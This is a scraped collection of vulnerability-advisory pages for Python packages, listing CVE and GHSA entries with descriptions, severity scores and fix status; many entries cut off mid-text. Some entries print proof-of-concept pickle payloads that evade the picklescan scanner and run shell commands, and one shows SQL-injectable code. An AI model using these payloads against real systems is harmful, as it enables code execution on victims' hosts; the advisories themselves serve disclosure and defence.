pymdownx.blocks.caption
pymdownx.blocks.caption
Source : NVD
## 2.7
Score
Published December 16, 2025
Severity LOW
CNA Score 2.7
Affected Technologies
Python
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 22.4
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
pymdown-extensions
Sources
NVD
Debian 12, 13 Severity MEDIUM No Fix Added at: Dec 18, 2025
Debian 14 Severity MEDIUM Has Fix Added at: Dec 18, 2025
Echo Severity MEDIUM No Fix Added at: Dec 18, 2025
pip Severity LOW Has Fix Added at: Dec 17, 2025
## Get a CVE risk assessment
Get a prioritized view of CV
Wiz
CVE-2026-33123 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2026-33123 [MEDIUM] CVE-2026-33123 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33123 :
Python vulnerability analysis and mitigation
pypdf is a free and open-source pure-python PDF library. Versions prior to 6.9.1 allow an attacker to craft a malicious PDF which leads to long runtimes and/or large memory usage. Exploitation requires accessing an array-based stream with many entries. This issue has been fixed in version 6.9.1.
Source : NVD
## 5.1
Score
Published March 20, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
open-webui
pypdf
Sources
NVD
Chainguard Has Fix Added at: Mar 24, 2026
Debian 11, 12, 1
Wiz
CVE-2025-67743 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.3
CVE-2025-67743 [MEDIUM] CVE-2025-67743 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67743 :
Python vulnerability analysis and mitigation
Local Deep Research is an AI-powered research assistant for deep, iterative research. In versions from 1.3.0 to before 1.3.9, the download service (download_service.py) makes HTTP requests using raw requests.get() without utilizing the application's SSRF protection (safe_requests.py). This can allow attackers to access internal services and attempt to reach cloud provider metadata endpoints (AWS/GCP/Azure), as well as perform internal network reconnaissance, by submitting malicious URLs through the API, depending on the deployment and surrounding controls. This issue has been patched in version 1.3.9.
Source : NVD
## 6.5
Score
Published December 23, 2025
Severity MEDIUM
CNA Score 6.3
Affected Technologies
Python
Wiz
GHSA-9m3x-qqw2-h32h Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-9m3x-qqw2-h32h Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-9m3x-qqw2-h32h :
Python vulnerability analysis and mitigation
## Summary
An unsafe deserialization vulnerability allows any unauthenticated user to execute arbitrary code on the host loading a pickle payload from an untrusted source.
## Details
eval
getattr
## PoC
import builtins
class EvilClass:
@staticmethod
def _obfuscated_eval(payload):
getattr(builtins, "eval")(payload)
def __reduce__(self):
payload = "__import__('os').system('echo \"successful attack\"')"
return self._obfuscated_eval, (payload,)
## Impact
Who is impacted?
Any organization or individual relying on picklescan to detect malicious pickle files from untrusted sources.
What is the impact?
Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is
Wiz
CVE-2025-68480 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-68480 [MEDIUM] CVE-2025-68480 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68480 :
Python vulnerability analysis and mitigation
Marshmallow is a lightweight library for converting complex objects to and from simple Python datatypes. In versions from 3.0.0rc1 to before 3.26.2 and from 4.0.0 to before 4.1.2, Schema.load(data, many=True) is vulnerable to denial of service attacks. A moderately sized request can consume a disproportionate amount of CPU time. This issue has been patched in version 3.26.2 and 4.1.2.
Source : NVD
## 5.3
Score
Published December 22, 2025
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 18.1
Exploitation Probability (EPSS) 0.1
Affected packages and librarie
Wiz
GHSA-9rwj-6rc7-p77c Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-9rwj-6rc7-p77c Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-9rwj-6rc7-p77c :
Python vulnerability analysis and mitigation
## Context
A SQL injection vulnerability exists in LangGraph's SQLite checkpoint implementation that allows attackers to manipulate SQL queries through metadata filter keys. This affects applications that accept untrusted metadata filter keys (not just filter values) in checkpoint search operations.
## Impact
Attackers who control metadata filter keys can execute arbitrary sql queries against the database.
## Root Cause
_metadata_predicate()
# VULNERABLE CODE (before fix)
for query_key, query_value in metadata_filter.items():
operator, param_value = _where_value(query_value)
predicates.append(
f"json_extract(CAST(metadata AS TEXT), '$.{query_key}') {operator}"
)
param_values.append(param_value)
While filter
Wiz
GHSA-v7cf-c9rm-wm3j Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-v7cf-c9rm-wm3j Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-v7cf-c9rm-wm3j :
Python vulnerability analysis and mitigation
## Summary
JustHTML.__init__()
TreeBuilder.finish()
_populate_selectedcontent()
_find_elements()
_find_element()
RecursionError
## Details
TreeBuilder.finish()
treebuilder.py#L476
_populate_selectedcontent(self.document)
_populate_selectedcontent()
treebuilder.py#L1243
_find_elements()
treebuilder.py#L1280
def _find_elements(self, node: Any, name: str, result: list[Any]) -> None:
"""Recursively find all elements with given name."""
if node.name == name:
result.append(node)
if node.has_child_nodes():
for child in node.children:
self._find_elements(child, name, result) # recursive call
RecursionError
JustHTML(html)
tokenizer.run()
tree_builder.finish()
_populate_selectedcontent(document)
_find_el
Wiz
GHSA-7wx9-6375-f5wh Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-7wx9-6375-f5wh Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-7wx9-6375-f5wh :
Python vulnerability analysis and mitigation
## Summary
profile.Profile.run
profile.Profile.runctx
profile.run()
profile.run(statement)
exec()
"Profile.run"
"run"
## Severity
exec()
## Affected Versions
picklescan v1.0.3 (latest — the profile entries were added in recent versions)
Earlier versions also affected (profile not blocked at all)
## Details
## Root Cause
scanner.py
profile
"profile": {"Profile.run", "Profile.runctx"},
profile.run
module = "profile"
name = "run"
elif unsafe_filter is not None and (unsafe_filter == "*" or g.name in unsafe_filter):
"run"
{"Profile.run", "Profile.runctx"}
"run" != "Profile.run"
profile.run()
# From Python's Lib/profile.py
def run(statement, filename=None, sort=-1):
prof = Profile()
try:
pro
Wiz
CVE-2026-1709 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.4
CVE-2026-1709 [CRITICAL] CVE-2026-1709 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1709 :
Python vulnerability analysis and mitigation
A flaw was found in Keylime. The Keylime registrar, since version 7.12.0, does not enforce client-side Transport Layer Security (TLS) authentication. This authentication bypass vulnerability allows unauthenticated clients with network access to perform administrative operations, including listing agents, retrieving public Trusted Platform Module (TPM) data, and deleting agents, by connecting without presenting a client certificate.
Source : NVD
## 9.8
Score
Published February 6, 2026
Severity CRITICAL
CNA Score 9.4
Affected Technologies
Python
Rocky Linux
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 11.3
Exploitation
Wiz
CVE-2025-11687 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2025-11687 [MEDIUM] CVE-2025-11687 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-11687 :
Python vulnerability analysis and mitigation
A flaw was found in the gi-docgen. This vulnerability allows arbitrary JavaScript execution in the context of the page — enabling DOM access, session cookie theft and other client-side attacks — via a crafted URL that supplies a malicious value to the q GET parameter (reflected DOM XSS).
Source : NVD
## 6.1
Score
Published January 26, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
Python
MinimOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
gi-docgen
gi-docgen-doc
Sources
NVD
Debian 12, 13 Severity MEDIUM No Fix Added at: Oct 15, 2
Wiz
CVE-2026-33154 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-33154 [HIGH] CVE-2026-33154 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33154 :
Python vulnerability analysis and mitigation
dynaconf is a configuration management tool for Python. Prior to version 3.2.13, Dynaconf is vulnerable to Server-Side Template Injection (SSTI) due to unsafe template evaluation in the @Jinja resolver. When the jinja2 package is installed, Dynaconf evaluates template expressions embedded in configuration values without a sandboxed environment. This issue has been patched in version 3.2.13.
Source : NVD
## 7.5
Score
Published March 20, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
Chainguard
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 15.5
Exploitation Probability (EPSS) 0.1
Affected packages and li
Wiz
CVE-2026-33310 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-33310 [HIGH] CVE-2026-33310 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33310 :
Python vulnerability analysis and mitigation
Intake is a package for finding, investigating, loading and disseminating data. Prior to version 2.0.9, the shell() syntax within parameter default values appears to be automatically expanded during the catalog parsing process. If a catalog contains a parameter default such as shell( ), the command may be executed when the catalog source is accessed. This means that if a user loads a malicious catalog YAML, embedded commands could execute on the host system. Version 2.0.9 mitigates the issue by making getshell False by default everywhere.
Source : NVD
## 8.8
Score
Published March 24, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Dat
Wiz
CVE-2025-14546 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2025-14546 [MEDIUM] CVE-2025-14546 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14546 :
Python vulnerability analysis and mitigation
Versions of the package fastapi-sso before 0.19.0 are vulnerable to Cross-site Request Forgery (CSRF) due to the improper validation of the OAuth state parameter during the authentication callback. While the get_login_url method allows for state generation, it does not persist the state or bind it to the user's session. Consequently, the verify_and_process method accepts the state received in the query parameters without verifying it against a trusted local value. This allows a remote attacker to trick a victim into visiting a malicious callback URL, which can result in the attacker's account being linked to the victim's internal account.
Source : NVD
## 6.9
Score
Published December 19, 2025
Severity MEDIUM
CNA Scor
Wiz
GHSA-97f8-7cmv-76j2 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-97f8-7cmv-76j2 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-97f8-7cmv-76j2 :
Python vulnerability analysis and mitigation
## Summary
scan_pytorch
picklescan
pickletools.genops(data)
magic_number
opcode.name
INT
LONG
magic_number
magic_code
PyTorch
eval
\_\_reduce\_\_
pickletools.genops(data)
magic_code
INT
LONG
pickle_module.load()
magic_code
## PoC
## Attack Step 1
we can edit the source code of the function _legacy_save() as follows:
class payload:
def __reduce__(self):
return (eval, ('MAGIC_NUMBER',))
pickle_module.dump(payload(), f, protocol=pickle_protocol)
## Attack Step 2
PyTorch
payload.pt
import torch
class payload:
def __reduce__(self):
return (__import__('os').system, ('touch /tmp/hacked',))
torch.save(payload(), './payload.pt', _use_new_zipfile_serialization = False)
## Picklescan result
ERR
Wiz
CVE-2026-32889 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-32889 [MEDIUM] CVE-2026-32889 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32889 :
Python vulnerability analysis and mitigation
tinytag is a Python library for reading audio file metadata. Version 2.2.0 allows an attacker who can supply MP3 files for parsing to trigger a non-terminating loop while the library parses an ID3v2 SYLT (synchronized lyrics) frame. In server-side deployments that automatically parse attacker-supplied files, a single 498-byte MP3 can cause the parsing operation to stop making progress and remain busy until the worker or process is terminated. The root cause is that _parse_synced_lyrics assumes _find_string_end_pos always returns a position greater than the current offset. That assumption is false when no string terminator is present in the remaining frame content. This issue has been fixed in version 2.2.1.
Source : NVD
Wiz
CVE-2026-24123 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.4
CVE-2026-24123 [HIGH] CVE-2026-24123 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24123 :
Python vulnerability analysis and mitigation
bentofile.yaml
description
docker.setup_script
docker.dockerfile_template
conda.environment_yml
Source : NVD
## 6.5
Score
Published January 26, 2026
Severity MEDIUM
CNA Score 7.4
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
bentoml
Sources
NVD
pip Severity HIGH Has Fix Added at: Jan 27, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Comp
Wiz
CVE-2026-27194 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-27194 [HIGH] CVE-2026-27194 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27194 :
Python vulnerability analysis and mitigation
D-Tale is a visualizer for pandas data structures. Versions prior to 3.20.0 are vulnerable to Remote Code Execution through the /save-column-filter endpoint. Users hosting D-Tale publicly can be vulnerable to remote code execution allowing attackers to run malicious code on the server. This issue has been fixed in version 3.20.0.
Source : NVD
## 8.1
Score
Published February 21, 2026
Severity HIGH
CNA Score 8.1
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 34.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
dtale
Sources
NVD
pip Severity HIGH Has Fix Added at: Feb 2
Wiz
CVE-2026-24049 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-24049 [HIGH] CVE-2026-24049 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24049 :
Python vulnerability analysis and mitigation
wheel is a command line tool for manipulating Python wheel files, as defined in PEP 427. In versions 0.40.0 through 0.46.1, the unpack function is vulnerable to file permission modification through mishandling of file permissions after extraction. The logic blindly trusts the filename from the archive header for the chmod operation, even though the extraction process itself might have sanitized the path. Attackers can craft a malicious wheel file that, when unpacked, changes the permissions of critical system files (e.g., /etc/passwd, SSH keys, config files), allowing for Privilege Escalation or arbitrary code execution by modifying now-writable scripts. This issue has been fixed in version 0.46.2.
Source : NVD
## 5.5
Wiz
CVE-2026-35175 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
CVE-2026-35175 [HIGH] CVE-2026-35175 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35175 :
Python vulnerability analysis and mitigation
Ajenti is a Linux and BSD modular server admin panel. Prior to 2.2.15, an authenticated user (using the auth_users plugin authentication method) could install a custom package even if this user is not superuser. This vulnerability is fixed in 2.2.15.
Source : NVD
## 7.2
Score
Published April 6, 2026
Severity HIGH
CNA Score 7.2
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 19.1
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
ajenti-panel
Sources
NVD
pip Severity HIGH Has Fix Added at: Apr 05, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in you
Wiz
CVE-2026-33125 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-33125 [HIGH] CVE-2026-33125 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33125 :
Python vulnerability analysis and mitigation
Frigate is a network video recorder (NVR) with realtime local object detection for IP cameras. In versions 0.16.2 and below, users with the viewer role can delete admin and low-privileged user accounts. Exploitation can lead to DoS and affect data integrity. This issue has been patched in version 0.16.3.
Source : NVD
## 8.1
Score
Published March 20, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
Python
NixOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
frigate
Sources
NVD
pip Severity HIGH Has Fix Added at: Mar 19, 2026
Nix Severi
Wiz
GHSA-955r-x9j8-7rhh Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-955r-x9j8-7rhh Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-955r-x9j8-7rhh :
Python vulnerability analysis and mitigation
## Summary
Picklescan uses _operator.methodcaller, which is a built-in python library function to execute remote pickle files.
## Details
The attack payload executes in the following steps:
First, the attacker crafts the payload by calling to _operator.methodcaller function in reduce method
Then when after the victim after checks whether or not the pickle file is safe by using Picklescan library and the library doesn't dectect any dangerous functions, pickle.load() loads this malicious pickle file, thus lead to remote code execution.
## PoC
import pickle
import pickletools
opcode2 = b'''cbuiltins
__import__
(Vos
tRp0
0c_operator
methodcaller
(Vsystem
Vecho "pwned by _operator.methodcaller"
tR(g0
tR.'''
pick
Wiz
CVE-2026-27695 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
CVE-2026-27695 [MEDIUM] CVE-2026-27695 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27695 :
Python vulnerability analysis and mitigation
namespace/ENTITY#{id}
Source : NVD
## 5.3
Score
Published February 25, 2026
Severity MEDIUM
CNA Score 4.3
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 16.4
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
zae-limiter
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Mar 02, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
CVE-2026-3561
Wiz
CVE-2026-34824 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-34824 [HIGH] CVE-2026-34824 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34824 :
Python vulnerability analysis and mitigation
Mesop is a Python-based UI framework that allows users to build web applications. From version 1.2.3 to before version 1.2.5, an uncontrolled resource consumption vulnerability exists in the WebSocket implementation of the Mesop framework. An unauthenticated attacker can send a rapid succession of WebSocket messages, forcing the server to spawn an unbounded number of operating system threads. This leads to thread exhaustion and Out of Memory (OOM) errors, causing a complete Denial of Service (DoS) for any application built on the framework. This issue has been patched in version 1.2.5.
Source : NVD
## 7.5
Score
Published April 3, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
Has Public Exploit No
Wiz
CVE-2026-33044 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.3
CVE-2026-33044 [HIGH] CVE-2026-33044 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33044 :
Python vulnerability analysis and mitigation
Home Assistant is open source home automation software that puts local control and privacy first. Starting in version 2020.02 and prior to version 2026.01, an authenticated party can add a malicious name to their device entity, allowing for Cross-Site Scripting attacks against anyone who can see a dashboard with a Map-card which includes that entity. It requires that the victim hovers over an information point. Version 2026.01 fixes the issue.
Source : NVD
## 7.3
Score
Published March 27, 2026
Severity HIGH
CNA Score 7.3
Affected Technologies
Python
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.6
Exploitat
Wiz
CVE-2026-33314 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-33314 [MEDIUM] CVE-2026-33314 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33314 :
Python vulnerability analysis and mitigation
pyLoad is a free and open-source download manager written in Python. Prior to version 0.5.0b3.dev97, a Host Header Spoofing vulnerability in the @local_check decorator allows unauthenticated external attackers to bypass local-only restrictions. This grants access to the Click'N'Load API endpoints, enabling attackers to remotely queue arbitrary downloads, leading to Server-Side Request Forgery (SSRF) and Denial of Service (DoS). This issue has been patched in version 0.5.0b3.dev97.
Source : NVD
## 6.5
Score
Published March 24, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Pe
Wiz
CVE-2026-27645 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-27645 [MEDIUM] CVE-2026-27645 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27645 :
Python vulnerability analysis and mitigation
changedetection.io is a free open source web page change detection tool. In versions prior to 0.54.1, the RSS single-watch endpoint reflects the UUID path parameter directly in the HTTP response body without HTML escaping. Since Flask returns text/html by default for plain string responses, the browser parses and executes injected JavaScript. Version 0.54.1 contains a fix for the issue.
Source : NVD
## 6.1
Score
Published February 25, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 70.2
Exploitation Probability (EPSS) 0.6
Affected packages and libraries
c
Wiz
GHSA-8h88-gxp3-j7pg Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-8h88-gxp3-j7pg Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-8h88-gxp3-j7pg :
Python vulnerability analysis and mitigation
## Summary
PublicKeyBundle.from_dict()
openssl_encrypt/modules/key_bundle.py
verify_signature()
to_identity()
Identity
## Affected Code
@classmethod
def from_dict(cls, data: Dict) -> "PublicKeyBundle":
"""
SECURITY: Does NOT verify signature. Call verify_signature() after creation.
"""
# Creates bundle without verification
## Impact
from_dict()
to_identity()
verify_signature()
key_resolver.py
## Recommended Fix
verified
PublicKeyBundle
to_identity()
to_identity()
verify_signature()
from_dict()
## Fix
f4a1ba6
releases/1.4.x
Source : NVD
## 6.6
Score
Published April 1, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
Wiz
CVE-2025-70559 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2025-70559 [HIGH] CVE-2025-70559 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-70559 :
Python vulnerability analysis and mitigation
pdfminer.six before 20251230 contains an insecure deserialization vulnerability in the CMap loading mechanism. The library uses Python pickle to deserialize CMap cache files without validation. An attacker with the ability to place a malicious pickle file in a location accessible to the application can trigger arbitrary code execution or privilege escalation when the file is loaded by a trusted process. This is caused by an incomplete patch to CVE-2025-64512.
Source : NVD
## 6.5
Score
Published February 3, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
Python
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentil
Wiz
CVE-2026-26717 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2026-26717 [MEDIUM] CVE-2026-26717 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26717 :
Python vulnerability analysis and mitigation
An issue in OpenFUN Richie (LMS) in src/richie/apps/courses/api.py. The application used the non-constant time == operator for HMAC signature verification in the sync_course_run_from_request function. This allows remote attackers to forge valid signatures and bypass authentication by measuring response time discrepancies
Source : NVD
## 4.8
Score
Published February 25, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 26.7
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
richie
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Mar 02, 2
Wiz
CVE-2026-21889 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.3
CVE-2026-21889 [LOW] CVE-2026-21889 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21889 :
Python vulnerability analysis and mitigation
Weblate is a web based localization tool. Prior to 5.15.2, the screenshot images were served directly by the HTTP server without proper access control. This could allow an unauthenticated user to access screenshots after guessing their filename. This vulnerability is fixed in 5.15.2.
Source : NVD
## 2.3
Score
Published January 14, 2026
Severity LOW
CNA Score 2.3
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 14.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
weblate
Sources
NVD
pip Severity LOW Has Fix Added at: Jan 14, 2026
## Get a CVE risk assessment
Get a p
Wiz
CVE-2026-23490 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-23490 [HIGH] CVE-2026-23490 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23490 :
Python vulnerability analysis and mitigation
pyasn1 is a generic ASN.1 library for Python. Prior to 0.6.2, a Denial-of-Service issue has been found that leads to memory exhaustion from malformed RELATIVE-OID with excessive continuation octets. This vulnerability is fixed in 0.6.2.
Source : NVD
## 7.5
Score
Published January 16, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
Rocky Linux
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
open-webui
fence-agents-bladecenter
Sources
NVD
AlmaLinux 8 Severity HIGH Has Fix Added at: Feb 11, 2026
AlmaLinux 9 Severity HIGH Has Fix Ad
Wiz
CVE-2025-65430 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2025-65430 [MEDIUM] CVE-2025-65430 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-65430 :
Python vulnerability analysis and mitigation
An issue was discovered in allauth-django before 65.13.0. IdP: marking a user as is_active=False after having handed tokens for that user while the account was still active had no effect. Fixed the access/refresh tokens are now rejected.
Source : NVD
## 5.4
Score
Published December 15, 2025
Severity MEDIUM
CNA Score 5.4
Affected Technologies
Python
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 11.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
django-allauth
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Dec 16, 2025
Debian 14 Severity MEDIUM Has Fix Added at: D
Wiz
CVE-2026-25136 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-25136 [HIGH] CVE-2026-25136 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25136 :
Python vulnerability analysis and mitigation
Rucio is a software framework that provides functionality to organize, manage, and access large volumes of scientific data using customizable policies. A reflected Cross-site Scripting vulnerability was located in versions prior to 35.8.3, 38.5.4, and 39.3.1 in the rendering of the ExceptionMessage of the WebUI 500 error which could allow attackers to steal login session tokens of users who navigate to a specially crafted URL. Versions 35.8.3, 38.5.4, and 39.3.1 fix the issue.
Source : NVD
## 6.1
Score
Published February 25, 2026
Severity MEDIUM
CNA Score 8.1
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Per
Wiz
CVE-2026-27026 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-27026 [MEDIUM] CVE-2026-27026 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27026 :
Python vulnerability analysis and mitigation
pypdf is a free and open-source pure-python PDF library. Prior to 6.7.1, an attacker who uses this vulnerability can craft a PDF which leads to long runtimes. This requires a malformed /FlateDecode stream, where the byte-by-byte decompression is used. This vulnerability is fixed in 6.7.1.
Source : NVD
## 6.9
Score
Published February 20, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
open-webui
pypdf
Sources
NVD
Chainguard Has Fix Added at: Feb 21, 2026
Debian 11, 12, 13 Se
Wiz
CVE-2026-27839 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
CVE-2026-27839 [MEDIUM] CVE-2026-27839 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27839 :
Python vulnerability analysis and mitigation
nutritional_values
Model.objects.get(pk=pk)
Source : NVD
## 4.3
Score
Published February 26, 2026
Severity MEDIUM
CNA Score 4.3
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
